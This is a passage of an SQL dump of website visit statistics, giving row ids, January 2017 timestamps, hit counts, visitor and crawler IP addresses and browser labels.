485191418,1,1,0,0,'163.172.64.189','other'),(84815,1485191464,1,0,1,0,'66.249.69.60',''),(84816,1485191642,2,2,0,0,'141.8.183.25','other'),(84817,1485191767,2,2,0,0,'141.8.142.175','other'),(84818,1485192687,1,1,0,0,'130.193.50.34','other'),(84819,1485193256,1,1,0,0,'77.93.46.127','chrome'),(84820,1485193569,1,1,0,0,'141.8.142.175','other'),(84821,1485193924,1,1,0,0,'180.76.15.19','other'),(84822,1485193950,1,1,0,0,'130.193.50.34','other'),(84823,1485194388,1,1,0,0,'37.52.114.226','opera'),(84824,1485195237,1,1,0,0,'91.196.178.163','chrome'),(84825,1485196110,1,1,0,0,'66.102.9.27','chrome'),(84826,1485196705,1,1,0,0,'130.193.51.19','other'),(84827,1485196831,2,2,0,0,'141.8.142.58','other'),(84828,1485197352,1,1,0,0,'66.249.69.56','chrome'),(84829,1485197435,1,1,0,0,'130.193.50.6','other'),(84830,1485197453,1,1,0,0,'66.249.75.28','chrome'),(84831,1485197572,1,1,0,0,'163.172.64.180','other'),(84832,1485197628,1,1,0,0,'37.55.224.36','chrome'),(84833,1485198303,1,1,0,0,'141.8.183.25','other'),(84834,1485198309,1,1,0,0,'163.172.64.228','other'),(84835,1485198428,1,1,0,0,'130.193.50.34','other'),(84836,1485199726,1,1,0,0,'141.8.142.67','other'),(84837,1485199851,1,1,0,0,'141.8.142.175','other'),(84838,1485200085,1,1,0,0,'130.193.51.14','other'),(84839,1485200193,1,1,0,0,'40.77.167.0','other'),(84840,1485200280,1,1,0,0,'94.179.53.159','chrome'),(84841,1485200474,1,1,0,0,'130.193.51.19','other'),(84842,1485200757,1,1,0,0,'91.196.178.98','chrome'),(84843,1485200880,1,1,0,0,'194.187.170.120','other'),(84844,1485200897,1,1,0,0,'130.193.50.34','other'),(84845,1485201143,1,1,0,0,'141.8.183.25','other'),(84846,1485202111,1,1,0,0,'180.76.15.154','other'),(84847,1485202342,1,1,0,0,'141.8.142.175','other'),(84848,1485202727,1,1,0,0,'69.30.211.2','other'),(84849,1485202735,3,3,0,0,'37.54.22.91','firefox'),(84850,1485202752,2,2,0,0,'141.8.183.25','other'),(84851,1485202895,2,2,0,0,'130.193.50.34','other'),(84852,1485203662,1,1,0,0,'40.77.167.0','other'),(84853,1485203900,1,1,0,0,'141.8.142.175','other'),(84854,1485205229,1,0,1,0,'68.180.229.254',''),(84855,1485206337,1,1,0,0,'141.8.183.25','other'),(84856,1485206503,1,1,0,0,'141.8.142.175','other'),(84857,1485206628,3,3,0,0,'130.193.50.34','other'),(84858,1485206714,1,1,0,0,'180.76.15.16','other'),(84859,1485207307,1,1,0,0,'141.8.183.25','other'),(84860,1485208829,1,0,1,0,'68.180.229.254',''),(84861,1485210091,3,3,0,0,'130.193.50.34','other'),(84862,1485210298,1,1,0,0,'62.212.73.211','other'),(84863,1485210789,1,0,1,0,'66.249.69.52',''),(84864,1485210992,1,1,0,0,'141.8.142.175','other'),(84865,1485212417,1,1,0,0,'163.172.64.224','other'),(84866,1485213131,1,1,0,0,'163.172.64.181','other'),(84867,1485216671,1,1,0,0,'163.172.64.251','other'),(84868,1485218681,1,1,0,0,'163.172.64.249','other'),(84869,1485220375,1,1,0,0,'163.172.64.223','other'),(84870,1485228341,1,1,0,0,'66.249.75.28','chrome'),(84871,1485229077,1,1,0,0,'141.8.183.25','other'),(84872,1485229196,1,1,0,0,'66.249.75.25','chrome'),(84873,1485229586,1,0,1,0,'66.249.69.60',''),(84874,1485230669,1,1,0,0,'157.55.39.137','other'),(84875,1485230905,1,1,0,0,'141.8.142.175','other'),(84876,1485230910,1,1,0,0,'163.172.64.186','other'),(84877,1485231084,1,1,0,0,'95.221.226.166','msie'),(84878,1485231141,1,0,1,0,'66.249.75.25',''),(84879,1485232174,1,1,0,0,'207.46.13.30','other'),(84880,1485233276,1,0,1,0,'66.249.69.52',''),(84881,1485234407,1,1,0,0,'141.8.183.25','other'),(84882,1485234532,1,1,0,0,'141.8.142.175','other'),(84883,1485235420,1,1,0,0,'157.55.39.137','other'),(84884,1485235730,1,0,1,0,'66.249.69.56',''),(84885,1485235986,1,1,0,0,'66.249.69.52','chrome'),(84886,1485236157,1,0,1,0,'68.180.229.190',''),(84887,1485236240,1,1,0,0,'91.196.178.67','firefox'),(84888,1485236559,1,1,0,0,'40.77.167.0','other'),(84889,1485238445,1,1,0,0,'66.249.75.28','chrome'),(84890,1485238648,1,1,0,0,'91.196.178.67','chrome'),(84891,1485239085,1,1,0,0,'91.196.178.72','chrome'),(84892,1485239922,1,0,1,0,'66.249.75.22',''),(84893,1485240526,1,1,0,0,'91.124.24.143','chrome'),(84894,1485240753,1,1,0,0,'163.172.64.180','other'),(84895,1485241380,1,1,0,0,'94.179.76.225','firefox'),(84896,1485241407,1,1,0,0,'130.193.51.19','other'),(84897,1485241536,1,1,0,0,'141.8.142.175','other'),(84898,1485241672,1,1,0,0,'91.196.178.72','chrome'),(84899,1485241976,1,1,0,0,'91.196.178.66','chrome'),(84900,1485242699,1,1,0,0,'91.196.178.104','firefox'),(84901,1485242837,1,1,0,0,'92.113.126.12','chrome'),(84902,1485243373,1,1,0,0,'91.196.178.72','chrome'),(84903,1485243393,1,1,0,0,'91.196.178.67','firefox'),(84904,1485243608,1,1,0,0,'82.145.223.56','opera'),(84905,1485243807,1,1,0,0,'130.180.219.54','chrome'),(84906,1485244314,1,1,0,0,'91.196.178.66','firefox'),(84907,1485244570,1,1,0,0,'95.132.8.43','firefox'),(84908,1485244678,1,1,0,0,'157.55.39.137','other'),(84909,1485245534,1,1,0,0,'95.132.8.43','firefox'),(84910,1485245689,4,4,0,0,'141.8.142.175','other'),(84911,1485245838,1,1,0,0,'62.212.73.211','other'),(84912,1485246227,1,1,0,0,'46.229.168.66','other'),(84913,1485246235,1,1,0,0,'130.193.51.19','other'),(84914,1485246847,1,1,0,0,'141.8.183.25','other'),(84915,1485247024,1,0,1,0,'66.249.69.60',''),(84916,1485247545,1,1,0,0,'163.172.64.183','other'),(84917,1485247843,4,4,0,0,'51.255.203.106','other'),(84918,1485247865,1,1,0,0,'163.172.64.178','other'),(84919,1485248216,1,1,0,0,'46.219.2.9','chrome'),(84920,1485248539,13,13,0,0,'163.172.68.136','other'),(84921,1485248746,1,1,0,0,'91.196.178.66','firefox'),(84922,1485249137,1,1,0,0,'176.195.204.18','msie'),(84923,1485249356,1,1,0,0,'141.8.142.175','other'),(84924,1485249627,1,1,0,0,'91.204.92.219','chrome'),(84925,1485250321,1,1,0,0,'46.175.241.59','chrome'),(84926,1485250710,1,1,0,0,'141.8.183.25','other'),(84927,1485250711,1,1,0,0,'130.193.51.19','other'),(84928,1485252468,1,0,1,0,'66.249.69.60',''),(84929,1485252787,1,1,0,0,'95.27.191.201','msie'),(84930,1485253350,1,1,0,0,'141.8.142.78','other'),(84931,1485253536,1,1,0,0,'91.196.178.66','firefox'),(84932,1485253561,1,1,0,0,'195.211.212.16','chrome'),(84933,1485254881,1,1,0,0,'176.195.98.126','msie'),(84934,1485255104,1,1,0,0,'180.76.15.158','other'),(84935,1485255160,1,1,0,0,'91.196.178.72','chrome'),(84936,1485255240,1,1,0,0,'91.196.178.66','chrome'),(84937,1485255512,1,1,0,0,'178.137.230.130','chrome'),(84938,1485255529,1,1,0,0,'5.255.253.67','other'),(84939,1485255606,1,1,0,0,'91.196.178.72','firefox'),(84940,1485256108,1,1,0,0,'176.115.98.3','chrome'),(84941,1485257548,1,0,1,0,'66.249.69.52',''),(84942,1485257647,1,1,0,0,'163.172.64.252','other'),(84943,1485257657,1,1,0,0,'178.94.251.252','chrome'),(84944,1485257688,1,1,0,0,'130.193.50.34','other'),(84945,1485257828,1,1,0,0,'91.196.178.72','chrome'),(84946,1485258343,1,1,0,0,'5.3.215.130','chrome'),(84947,1485258891,1,1,0,0,'46.37.204.225','chrome'),(84948,1485259618,1,1,0,0,'5.255.253.47','other'),(84949,1485259698,1,1,0,0,'94.178.207.87','chrome'),(84950,1485259712,1,1,0,0,'195.49.151.99','chrome'),(84951,1485260801,1,1,0,0,'37.53.225.37','chrome'),(84952,1485260883,1,1,0,0,'109.63.216.124','chrome'),(84953,1485261097,1,1,0,0,'78.111.186.82','firefox'),(84954,1485261288,1,1,0,0,'176.120.38.130','chrome'),(84955,1485261605,1,0,1,0,'66.249.69.60',''),(84956,1485261981,1,1,0,0,'94.178.7.201','chrome'),(84957,1485261995,1,1,0,0,'54.204.178.12','chrome'),(84958,1485262500,1,1,0,0,'37.73.237.143','other'),(84959,1485263452,2,2,0,0,'91.196.178.132','chrome'),(84960,1485263596,1,1,0,0,'91.196.178.66','firefox'),(84961,1485263654,1,1,0,0,'141.8.142.175','other'),(84962,1485263723,1,1,0,0,'94.231.178.90','chrome'),(84963,1485263836,1,1,0,0,'5.45.192.86','chrome'),(84964,1485263954,1,1,0,0,'130.193.50.34','other'),(84965,1485264144,1,0,1,0,'68.180.229.254',''),(84966,1485264976,1,1,0,0,'95.132.132.195','chrome'),(84967,1485266069,1,1,0,0,'91.196.178.65','firefox'),(84968,1485266081,1,1,0,0,'95.221.226.166','msie'),(84969,1485266338,1,1,0,0,'141.8.183.25','other'),(84970,1485266422,1,1,0,0,'95.134.203.233','firefox'),(84971,1485266436,1,1,0,0,'91.196.177.46','firefox'),(84972,1485266647,1,1,0,0,'176.120.38.130','chrome'),(84973,1485266895,1,1,0,0,'37.52.47.231','firefox'),(84974,1485267129,1,1,0,0,'141.8.142.175','other'),(84975,1485267470,1,1,0,0,'163.172.64.247','other'),(84976,1485267956,1,1,0,0,'5.3.146.179','msie'),(84977,1485268264,1,1,0,0,'91.196.178.132','chrome'),(84978,1485268464,1,1,0,0,'163.172.71.225','other'),(84979,1485268613,1,1,0,0,'163.172.64.241','other'),(84980,1485269052,1,1,0,0,'163.172.64.248','other'),(84981,1485269094,1,1,0,0,'31.43.20.91','chrome'),(84982,1485269401,1,1,0,0,'94.179.31.144','firefox'),(84983,1485271742,1,1,0,0,'66.102.9.25','chrome'),(84984,1485271934,2,0,2,0,'68.180.229.254',''),(84985,1485272380,1,1,0,0,'78.152.169.96','chrome'),(84986,1485272991,1,0,1,0,'66.249.69.56',''),(84987,1485273425,1,1,0,0,'163.172.64.251','other'),(84988,1485273867,1,1,0,0,'95.135.90.5','chrome'),(84989,1485273901,1,1,0,0,'66.249.75.28','chrome'),(84990,1485273931,1,1,0,0,'141.8.183.19','other'),(84991,1485273938,1,1,0,0,'91.196.178.65','firefox'),(84992,1485273943,1,1,0,0,'130.193.50.6','other'),(84993,1485273977,1,1,0,0,'130.193.50.34','other'),(84994,1485274548,1,1,0,0,'157.55.39.18','other'),(84995,1485276590,1,1,0,0,'66.249.75.28','chrome'),(84996,1485277569,2,0,2,0,'66.249.69.56',''),(84997,1485277727,1,1,0,0,'37.55.52.179','chrome'),(84998,1485279103,1,1,0,0,'91.196.178.163','chrome'),(84999,1485280123,1,1,0,0,'176.195.124.22','chrome'),(85000,1485280198,1,1,0,0,'91.214.179.11','chrome'),(85001,1485280428,1,0,1,0,'66.249.75.28',''),(85002,1485280755,1,1,0,0,'194.146.182.26','chrome'),(85003,1485282012,1,1,0,0,'130.193.50.34','other'),(85004,1485282901,1,0,1,0,'66.249.69.56',''),(85005,1485283413,1,1,0,0,'77.52.180.238','chrome'),(85006,1485284302,1,1,0,0,'163.172.64.249','other'),(85007,1485284574,1,1,0,0,'37.204.156.241','msie'),(85008,1485285139,1,1,0,0,'188.32.31.90','msie'),(85009,1485286162,1,1,0,0,'66.249.65.55','chrome'),(85010,1485286377,1,1,0,0,'180.76.15.156','other'),(85011,1485288832,1,1,0,0,'157.55.39.137','other'),(85012,1485288912,1,1,0,0,'141.0.13.197','other'),(85013,1485289589,1,1,0,0,'66.102.9.40','chrome'),(85014,1485290193,1,1,0,0,'37.204.39.67','chrome'),(85015,1485291572,1,1,0,0,'66.249.65.56','chrome'),(85016,1485292675,1,1,0,0,'66.249.65.62','chrome'),(85017,1485292783,1,0,1,0,'66.249.65.60',''),(85018,1485293891,1,1,0,0,'163.172.64.243','other'),(85019,1485294025,1,1,0,0,'46.4.116.197','other'),(85020,1485296931,1,1,0,0,'207.46.13.30','other'),(85021,1485298090,1,1,0,0,'163.172.64.199','other'),(85022,1485298685,1,0,1,0,'68.180.229.254',''),(85023,1485300029,1,1,0,0,'130.193.50.34','other'),(85024,1485301940,1,1,0,0,'130.193.50.34','other'),(85025,1485302316,1,1,0,0,'130.193.51.19','other'),(85026,1485303009,1,1,0,0,'141.8.142.67','other'),(85027,1485303616,1,1,0,0,'141.8.142.175','other'),(85028,1485304413,1,1,0,0,'130.193.50.34','other'),(85029,1485304481,1,1,0,0,'141.8.183.19','other'),(85030,1485304979,1,1,0,0,'163.172.64.223','other'),(85031,1485306448,1,1,0,0,'163.172.64.233','other'),(85032,1485306512,1,0,1,0,'66.249.65.56',''),(85033,1485306704,1,1,0,0,'141.8.183.25','other'),(85034,1485307094,2,2,0,0,'141.8.142.175','other'),(85035,1485308118,1,1,0,0,'130.193.50.34','other'),(85036,1485308160,1,1,0,0,'141.8.142.61','other'),(85037,1485308215,2,2,0,0,'141.8.183.25','other'),(85038,1485309113,1,1,0,0,'141.8.142.175','other'),(85039,1485309323,1,1,0,0,'163.172.64.243','other'),(85040,1485310017,1,1,0,0,'141.8.142.175','other'),(85041,1485310234,1,1,0,0,'130.193.50.34','other'),(85042,1485311129,1,1,0,0,'141.8.142.67','other'),(85043,1485311186,2,2,0,0,'141.8.183.25','other'),(85044,1485311194,1,1,0,0,'141.8.142.61','other'),(85045,1485311199,1,1,0,0,'141.8.183.19','other'),(85046,1485311914,1,1,0,0,'163.172.64.216','other'),(85047,1485312511,1,0,1,0,'66.249.65.62',''),(85048,1485313871,1,1,0,0,'141.8.142.175','other'),(85049,1485316369,1,1,0,0,'217.69.133.232','other'),(85050,1485316486,1,1,0,0,'66.249.65.57','chrome'),(85051,1485316601,1,1,0,0,'130.193.50.34','other'),(85052,1485316675,2,2,0,0,'141.8.142.175','other'),(85053,1485317697,1,1,0,0,'130.193.50.34','other'),(85054,1485318072,1,1,0,0,'217.69.133.224','other'),(85055,1485319704,1,1,0,0,'141.8.142.61','other'),(85056,1485322867,1,1,0,0,'91.196.178.71','firefox'),(85057,1485323135,1,1,0,0,'141.8.183.25','other'),(85058,1485324543,1,1,0,0,'195.230.129.94','chrome'),(85059,1485325013,1,1,0,0,'91.124.55.58','chrome'),(85060,1485325168,1,1,0,0,'180.76.15.140','other'),(85061,1485325486,1,1,0,0,'66.249.93.91','chrome'),(85062,1485325574,3,3,0,0,'69.30.211.2','other'),(85063,1485326306,1,1,0,0,'141.8.142.175','other'),(85064,1485326372,1,1,0,0,'91.196.178.66','firefox'),(85065,1485326714,1,1,0,0,'91.196.178.72','chrome'),(85066,1485326959,2,2,0,0,'130.193.50.34','other'),(85067,1485327063,1,1,0,0,'91.196.178.35','firefox'),(85068,1485327365,1,1,0,0,'178.154.189.31','other'),(85069,1485327593,1,1,0,0,'194.44.179.121','chrome'),(85070,1485327870,1,1,0,0,'176.193.104.174','msie'),(85071,1485328296,1,1,0,0,'141.8.183.25','other'),(85072,1485328304,1,1,0,0,'91.196.178.72','chrome'),(85073,1485328796,1,1,0,0,'157.55.39.137','other'),(85074,1485328978,1,1,0,0,'91.196.178.68','chrome'),(85075,1485329051,1,0,1,0,'68.180.229.254',''),(85076,1485329103,1,1,0,0,'92.112.59.90','chrome'),(85077,1485329131,1,1,0,0,'91.196.178.66','firefox'),(85078,1485329644,1,1,0,0,'78.111.185.26','chrome'),(85079,1485330844,1,1,0,0,'5.58.128.166','chrome'),(85080,1485331604,1,1,0,0,'91.124.113.55','chrome'),(85081,1485331768,1,1,0,0,'91.196.178.67','chrome'),(85082,1485331957,1,1,0,0,'91.196.178.129','chrome'),(85083,1485332031,1,1,0,0,'95.135.28.11','chrome'),(85084,1485332174,1,1,0,0,'78.111.185.120','firefox'),(85085,1485332247,1,1,0,0,'91.196.178.68','firefox'),(85086,1485332412,1,1,0,0,'91.196.178.163','chrome'),(85087,1485333247,1,1,0,0,'91.196.178.72','firefox'),(85088,1485333556,1,1,0,0,'46.165.197.141','other'),(85089,1485333678,1,1,0,0,'157.55.39.137','other'),(85090,1485333886,1,0,1,0,'68.180.229.254',''),(85091,1485334531,2,2,0,0,'144.76.39.34','other'),(85092,1485334656,1,0,1,0,'66.249.65.61',''),(85093,1485334893,1,1,0,0,'37.55.226.141','chrome'),(85094,1485335348,2,2,0,0,'141.8.142.175','other'),(85095,1485335856,1,1,0,0,'91.124.61.136','chrome'),(85096,1485336103,1,1,0,0,'91.196.178.68','firefox'),(85097,1485336634,1,1,0,0,'91.196.178.129','chrome'),(85098,1485337109,1,1,0,0,'94.179.58.50','firefox'),(85099,1485337680,1,1,0,0,'195.49.151.99','chrome'),(85100,1485337732,1,1,0,0,'163.172.64.253','other'),(85101,1485338102,1,1,0,0,'92.113.7.79','chrome'),(85102,1485338118,1,1,0,0,'130.193.50.34','other'),(85103,1485339076,1,1,0,0,'94.179.88.26','firefox'),(85104,1485339198,1,0,1,0,'66.249.65.61',''),(85105,1485340411,1,1,0,0,'95.134.203.233','firefox'),(85106,1485341426,1,1,0,0,'180.76.15.153','other'),(85107,1485341664,1,1,0,0,'82.145.221.6','other'),(85108,1485341789,1,1,0,0,'95.134.203.233','firefox'),(85109,1485341945,1,1,0,0,'66.102.9.35','chrome'),(85110,1485342037,1,1,0,0,'66.102.9.38','chrome'),(85111,1485342412,1,1,0,0,'66.249.65.60','chrome'),(85112,1485342582,1,1,0,0,'37.54.38.21','msie'),(85113,1485343568,1,1,0,0,'90.168.187.123','chrome'),(85114,1485344009,1,1,0,0,'5.35.25.103','firefox'),(85115,1485344094,1,1,0,0,'91.244.16.183','chrome'),(85116,1485344719,1,0,1,0,'66.249.65.60',''),(85117,1485345686,1,1,0,0,'163.172.64.222','other'),(85118,1485346367,1,1,0,0,'78.111.185.133','opera'),(85119,1485347036,2,2,0,0,'66.249.65.57','chrome'),(85120,1485347767,1,1,0,0,'178.95.208.78','chrome'),(85121,1485347795,1,1,0,0,'94.178.1.154','chrome'),(85122,1485348713,1,1,0,0,'91.196.178.168','chrome'),(85123,1485348831,1,1,0,0,'95.134.203.233','firefox'),(85124,1485349619,1,1,0,0,'91.196.178.35','firefox'),(85125,1485350248,1,1,0,0,'95.135.8.80','firefox'),(85126,1485350971,1,1,0,0,'66.249.65.55','chrome'),(85127,1485351439,2,2,0,0,'141.8.183.25','other'),(85128,1485351440,3,3,0,0,'141.8.142.175','other'),(85129,1485351448,2,2,0,0,'130.193.51.19','other'),(85130,1485351452,3,3,0,0,'130.193.50.34','other'),(85131,1485351969,1,1,0,0,'91.196.178.67','chrome'),(85132,1485352132,1,1,0,0,'163.172.64.234','other'),(85133,1485352940,1,1,0,0,'141.8.142.175','other'),(85134,1485353028,1,1,0,0,'178.95.203.161','chrome'),(85135,1485353139,1,1,0,0,'46.174.123.144','firefox'),(85136,1485353319,1,1,0,0,'185.41.23.2','chrome'),(85137,1485354859,1,1,0,0,'130.193.50.34','other'),(85138,1485355066,1,1,0,0,'91.121.97.49','other'),(85139,1485355148,1,1,0,0,'91.196.177.46','firefox'),(85140,1485355221,1,1,0,0,'91.196.178.67','firefox'),(85141,1485355515,1,1,0,0,'176.120.38.130','chrome'),(85142,1485355700,1,1,0,0,'163.172.64.231','other'),(85143,1485355777,1,1,0,0,'94.178.1.154','chrome'),(85144,1485356278,1,1,0,0,'94.179.58.50','firefox'),(85145,1485356368,1,1,0,0,'141.8.142.67','other'),(85146,1485356765,1,1,0,0,'141.8.142.175','other'),(85147,1485357190,1,1,0,0,'92.113.7.79','chrome'),(85148,1485357233,1,0,1,0,'66.249.65.61',''),(85149,1485357295,1,1,0,0,'91.196.178.164','chrome'),(85150,1485357424,1,1,0,0,'31.43.21.23','firefox'),(85151,1485357801,1,1,0,0,'163.172.64.226','other'),(85152,1485357983,1,1,0,0,'163.172.64.179','other'),(85153,1485358366,3,1,2,0,'66.249.65.55',''),(85154,1485358391,1,1,0,0,'66.249.65.61','chrome'),(85155,1485358485,1,1,0,0,'163.172.64.186','other'),(85156,1485358487,1,0,1,0,'66.249.65.60',''),(85157,1485358675,1,1,0,0,'130.193.51.19','other'),(85158,1485358768,2,0,2,0,'66.249.65.57',''),(85159,1485358945,1,1,0,0,'66.102.9.27','chrome'),(85160,1485359064,1,1,0,0,'157.55.39.137','other'),(85161,1485359836,1,1,0,0,'66.249.65.55','chrome'),(85162,1485360551,1,1,0,0,'66.249.65.62','chrome'),(85163,1485360576,1,1,0,0,'141.8.142.175','other'),(85164,1485361430,1,1,0,0,'180.76.15.134','other'),(85165,1485362074,1,1,0,0,'130.193.50.34','other'),(85166,1485362129,2,2,0,0,'66.249.65.57','chrome'),(85167,1485362153,1,1,0,0,'66.249.65.56','chrome'),(85168,1485362178,1,1,0,0,'46.211.153.143','other'),(85169,1485362451,1,1,0,0,'95.135.90.214','chrome'),(85170,1485362476,1,1,0,0,'130.193.50.4','other'),(85171,1485363378,1,1,0,0,'176.15.64.235','msie'),(85172,1485363438,1,1,0,0,'91.240.48.46','chrome'),(85173,1485363812,1,1,0,0,'40.77.167.0','other'),(85174,1485364060,1,0,1,0,'66.249.65.55',''),(85175,1485364290,1,1,0,0,'163.172.64.251','other'),(85176,1485364521,1,1,0,0,'66.249.65.61','chrome'),(85177,1485364922,1,1,0,0,'141.8.183.25','other'),(85178,1485366297,2,0,2,0,'66.249.65.60',''),(85179,1485367244,1,1,0,0,'46.200.75.36','chrome'),(85180,1485367640,1,1,0,0,'66.249.65.61','chrome'),(85181,1485368840,1,1,0,0,'66.249.65.56','chrome'),(85182,1485368841,1,1,0,0,'66.249.65.57','chrome'),(85183,1485368906,1,1,0,0,'46.211.121.8','chrome'),(85184,1485369050,1,1,0,0,'163.172.64.177','other'),(85185,1485369314,1,1,0,0,'130.193.51.19','other'),(85186,1485369345,3,3,0,0,'141.8.142.175','other'),(85187,1485369374,1,1,0,0,'130.193.50.34','other'),(85188,1485369386,1,1,0,0,'141.8.142.67','other'),(85189,1485370113,1,1,0,0,'163.172.64.230','other'),(85190,1485370169,1,1,0,0,'5.255.253.67','other'),(85191,1485370880,1,1,0,0,'130.193.51.19','other'),(85192,1485370883,1,1,0,0,'141.8.142.175','other'),(85193,1485370959,1,0,1,0,'66.249.64.119',''),(85194,1485371109,1,1,0,0,'95.132.133.40','chrome'),(85195,1485372298,1,0,1,0,'66.249.64.21',''),(85196,1485372340,1,1,0,0,'91.196.178.163','chrome'),(85197,1485372715,3,3,0,0,'51.15.135.93','other'),(85198,1485373029,1,0,1,0,'68.180.229.190',''),(85199,1485373186,1,1,0,0,'130.193.50.34','other'),(85200,1485375388,1,1,0,0,'91.198.4.239','chrome'),(85201,1485375873,1,1,0,0,'130.193.50.34','other'),(85202,1485377180,1,1,0,0,'130.193.50.34','other'),(85203,1485377272,1,1,0,0,'141.8.142.175','other'),(85204,1485377276,1,1,0,0,'130.193.51.19','other'),(85205,1485378217,1,1,0,0,'163.172.64.254','other'),(85206,1485378855,3,3,0,0,'141.8.142.175','other'),(85207,1485378889,1,1,0,0,'130.193.51.19','other'),(85208,1485379440,1,1,0,0,'130.193.50.34','other'),(85209,1485379813,1,1,0,0,'91.196.178.165','other'),(85210,1485380837,1,1,0,0,'130.193.50.34','other'),(85211,1485381037,1,0,1,0,'66.249.64.115',''),(85212,1485381415,1,1,0,0,'178.136.15.70','chrome'),(85213,1485382388,1,1,0,0,'157.55.39.18','other'),(85214,1485383179,1,1,0,0,'163.172.64.180','other'),(85215,1485384014,1,1,0,0,'163.172.64.183','other'),(85216,1485384802,1,1,0,0,'141.8.142.175','other'),(85217,1485385630,1,1,0,0,'130.193.51.19','other'),(85218,1485385906,1,1,0,0,'180.76.15.34','other'),(85219,1485388019,1,1,0,0,'130.193.50.34','other'),(85220,1485388963,1,1,0,0,'163.172.64.193','other'),(85221,1485389728,1,1,0,0,'77.52.177.114','chrome'),(85222,1485389817,1,1,0,0,'178.255.215.94','other'),(85223,1485390479,1,1,0,0,'141.8.183.25','other'),(85224,1485390510,1,1,0,0,'163.172.64.230','other'),(85225,1485390632,1,1,0,0,'163.172.64.183','other'),(85226,1485390883,1,1,0,0,'66.249.64.79','chrome'),(85227,1485391179,1,1,0,0,'130.193.50.34','other'),(85228,1485391492,1,1,0,0,'141.8.142.175','other'),(85229,1485391825,1,1,0,0,'66.249.64.79','chrome'),(85230,1485394895,1,0,1,0,'66.249.64.27',''),(85231,1485394937,1,0,1,0,'68.180.229.254',''),(85232,1485395882,1,1,0,0,'141.8.142.58','other'),(85233,1485396083,1,1,0,0,'141.8.142.206','other'),(85234,1485396407,1,1,0,0,'141.8.142.85','other'),(85235,1485397660,1,1,0,0,'66.249.64.123','chrome'),(85236,1485398299,1,0,1,0,'66.249.64.24',''),(85237,1485398952,1,1,0,0,'66.249.64.21','chrome'),(85238,1485399244,2,2,0,0,'130.193.50.34','other'),(85239,1485399579,1,0,1,0,'66.249.64.59',''),(85240,1485399640,1,0,1,0,'66.249.64.123',''),(85241,1485399643,1,1,0,0,'141.8.142.175','other'),(85242,1485399763,1,1,0,0,'66.249.64.69','chrome'),(85243,1485403471,1,0,1,0,'66.249.64.123',''),(85244,1485404725,1,0,1,0,'66.249.64.27',''),(85245,1485405614,1,0,1,0,'66.249.64.59',''),(85246,1485406644,1,1,0,0,'195.244.8.101','chrome'),(85247,1485407231,1,1,0,0,'5.255.253.36','other'),(85248,1485407820,1,0,1,0,'66.249.64.119',''),(85249,1485408072,1,0,1,0,'66.249.64.115',''),(85250,1485408815,1,1,0,0,'157.55.39.18','other'),(85251,1485409087,1,1,0,0,'141.8.142.85','other'),(85252,1485409242,1,1,0,0,'91.196.178.68','firefox'),(85253,1485409380,1,1,0,0,'40.77.167.0','other'),(85254,1485409855,1,1,0,0,'130.193.50.4','other'),(85255,1485409970,1,1,0,0,'163.172.64.236','other'),(85256,1485410127,1,0,1,0,'66.249.64.59',''),(85257,1485410129,1,0,1,0,'66.249.64.115',''),(85258,1485411683,1,1,0,0,'130.193.50.34','other'),(85259,1485411770,1,1,0,0,'130.193.51.19','other'),(85260,1485412263,1,0,1,0,'66.249.64.115',''),(85261,1485412291,1,1,0,0,'66.249.93.14','chrome'),(85262,1485412612,1,1,0,0,'141.8.142.67','other'),(85263,1485412684,2,2,0,0,'130.193.50.34','other'),(85264,1485413158,1,1,0,0,'141.8.142.85','other'),(85265,1485413304,1,1,0,0,'217.196.168.51','opera'),(85266,1485413314,1,1,0,0,'141.8.142.175','other'),(85267,1485413773,2,1,1,0,'66.249.64.59',''),(85268,1485414125,1,1,0,0,'163.172.64.224','other'),(85269,1485414321,1,1,0,0,'91.196.178.40','chrome'),(85270,1485414390,1,0,1,0,'66.249.64.123',''),(85271,1485414512,5,0,5,0,'66.249.64.57',''),(85272,1485415457,1,1,0,0,'130.193.50.34','other'),(85273,1485415731,2,2,0,0,'141.8.142.175','other'),(85274,1485416208,1,1,0,0,'66.249.64.61','chrome'),(85275,1485416292,2,2,0,0,'66.249.64.57','chrome'),(85276,1485416420,1,1,0,0,'130.193.50.34','other'),(85277,1485416945,1,1,0,0,'195.114.121.181','chrome'),(85278,1485417106,1,0,1,0,'66.249.64.119',''),(85279,1485417301,1,1,0,0,'141.8.142.175','other'),(85280,1485417395,1,1,0,0,'151.80.44.115','other'),(85281,1485418508,1,1,0,0,'5.255.253.68','other'),(85282,1485418562,1,1,0,0,'130.193.51.19','other'),(85283,1485418565,1,1,0,0,'141.8.132.10','other'),(85284,1485418889,2,2,0,0,'130.193.50.34','other'),(85285,1485419070,1,1,0,0,'82.207.91.234','firefox'),(85286,1485419135,1,1,0,0,'176.38.47.48','chrome'),(85287,1485419467,1,1,0,0,'141.8.183.25','other'),(85288,1485419831,1,1,0,0,'46.211.113.229','chrome'),(85289,1485419920,1,1,0,0,'91.196.178.72','chrome'),(85290,1485420431,1,1,0,0,'130.180.218.201','firefox'),(85291,1485420918,1,0,1,0,'66.249.64.57',''),(85292,1485420920,1,1,0,0,'92.112.219.105','chrome'),(85293,1485421107,2,2,0,0,'130.193.51.19','other'),(85294,1485421112,1,1,0,0,'141.8.132.10','other'),(85295,1485421380,1,1,0,0,'78.137.4.82','firefox'),(85296,1485421969,1,1,0,0,'141.8.142.67','other'),(85297,1485421974,1,1,0,0,'141.8.183.19','other'),(85298,1485422651,1,1,0,0,'141.8.184.11','other'),(85299,1485422755,1,0,1,0,'66.249.64.115',''),(85300,1485422794,1,1,0,0,'5.255.253.9','other'),(85301,1485422797,1,1,0,0,'141.8.142.58','other'),(85302,1485422981,1,1,0,0,'5.255.253.47','other'),(85303,1485423009,1,1,0,0,'178.154.149.11','other'),(85304,1485423080,1,1,0,0,'79.142.196.52','chrome'),(85305,1485423259,1,1,0,0,'157.55.39.18','other'),(85306,1485423815,1,0,1,0,'68.180.229.190',''),(85307,1485424939,1,1,0,0,'141.8.142.78','other'),(85308,1485425080,1,1,0,0,'5.255.253.30','other'),(85309,1485425146,1,1,0,0,'93.158.152.40','other'),(85310,1485425244,1,1,0,0,'91.196.177.26','chrome'),(85311,1485425502,1,1,0,0,'178.154.149.11','other'),(85312,1485425742,1,1,0,0,'5.255.253.26','other'),(85313,1485425747,1,1,0,0,'93.158.152.46','other'),(85314,1485425750,1,1,0,0,'141.8.142.167','other'),(85315,1485425751,1,0,1,0,'66.249.64.123',''),(85316,1485425972,1,1,0,0,'91.196.178.72','chrome'),(85317,1485426233,2,2,0,0,'141.8.142.175','other'),(85318,1485426519,1,1,0,0,'101.16.190.24','chrome'),(85319,1485426561,1,1,0,0,'175.152.28.209','chrome'),(85320,1485427015,1